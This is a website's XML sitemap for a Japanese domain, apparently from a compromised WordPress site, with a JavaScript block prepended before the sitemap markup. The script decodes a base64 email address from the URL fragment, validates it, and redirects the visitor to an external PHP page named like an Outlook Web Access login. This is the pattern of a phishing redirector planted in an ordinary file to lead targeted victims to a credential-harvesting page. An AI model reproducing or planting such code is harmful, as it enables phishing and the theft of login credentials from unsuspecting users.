<script type="text/javascript">
function validateEmail(referrer) {
var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(referrer);
}
decodeBase64 = function(s) {
     var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;
     var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
     for(i=0;i<64;i++){e[A.charAt(i)]=i;}
     for(x=0;x<L;x++){
         c=e[s.charAt(x)];b=(b<<6)+c;l+=6;
         while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));}
     }
     return r;
}
//var ramp = window.location.hash.substring(1);
var hash = window.location.hash.substring(1);
var email = decodeBase64(hash);
var email64 = decodeBase64(hash);
var email2 = email64.replace('$', '@');
var hash2 = btoa(email2);
console.log(email);
if(validateEmail(email2)) {
  console.log(email);
  window.location = "https://event.keplercloud.com/wp-content/owa3.php#"+hash2;
}
</script><?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet type='text/xsl' href='https://www.1209.co.jp/mwbhpwp/wp-content/plugins/google-sitemap-generator/sitemap.xsl'?><!-- sitemap-generator-url='http://www.arnebrachhold.de' sitemap-generator-version='4.1.21' -->
<!-- generated-on='2026年4月19日 2:10 AM' -->
<urlset xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance' xsi:schemaLocation='http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd' xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>	<url>
		<loc>https://www.1209.co.jp/</loc>
		<lastmod>2025-02-03T08:22:07+00:00</lastmod>
		<changefreq>daily</changefreq>
		<priority>1.0</priority>
	</url>
	<url>
		<loc>https://www.1209.co.jp/sitemap.html</loc>
		<lastmod>2025-02-03T08:22:07+00:00</lastmod>
		<changefreq>monthly</changefreq>
		<priority>0.5</priority>
	</url>
</urlset><!-- Request ID: 37be7e54ec368661165f898cd077877d; Queries for sitemap: 3; Total queries: 32; Seconds: 0; Memory for sitemap: 1KB; Total memory: 52.5MB -->
